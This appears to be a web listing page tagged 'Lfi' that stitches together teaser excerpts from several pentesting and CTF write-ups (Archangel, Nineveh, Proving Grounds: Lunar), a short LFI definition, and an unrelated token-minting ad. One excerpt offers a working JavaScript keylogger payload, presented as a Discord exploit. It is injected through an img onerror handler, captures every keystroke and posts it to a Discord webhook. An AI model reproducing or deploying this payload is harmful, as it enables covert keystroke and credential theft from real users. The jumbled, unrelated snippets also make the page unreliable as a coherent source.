Lfi

Today we will go through a challenge that covers a proper web application CTF. Archangel contains everything from fuzzing, directory traversal, Local File Inclusion, Remote Code Execution, Horizontal privilege escalation and finally Root privilege escalation. As I already mention we will cover lots of topic and it will be little…

Get ready to experience the next level of token minting with LFi’s latest version of Cloud Minting technology. The process of minting tokens or coins is now even simpler with the newest advancement in Cloud Minting. …

CTF challenges are a great way to practice core skills needed in a pen-testing engagement, they allow you to exercise your problem-solving skills as you progress, while troubleshooting and doing further research on the challenge posed to you. In these posts, I’ll be detailing my steps taken to enumerate and…

Local File Inclusion (LFI) is a type of web application vulnerability that allows an attacker to access and execute files on a web server. In an LFI attack, an attacker is able to manipulate a web application to include a local file, which can contain malicious code that is executed…

First I made a Nmap scan and it shows that we are dealing with web application and maybe we could connect SSH if we find any ssh credential in future. Open the ip address with browser and search the page, check page source, tech that using in application and returning…

I´m pronouncing this nine “evah”, I wonder if that’s correct… Anyways! Today(night) I’m tackling Nineveh and hoping to make this a swift in and out heist. Ready team? Let’s gooooo! Box: Nineveh IP: 10.10.10.43 Do I even have to say it? Nmap -sC -sV -oA Nineveh 10.10.10.43 Looking like a…

Today I am sharing a very nice exploit for the application discord. What this code does is it token hijacks a user via a webhook using local file inclusion allowing us to keylog the users every keystroke. <img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

Today we will take a look at Proving grounds: Lunar. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes. Network PORT…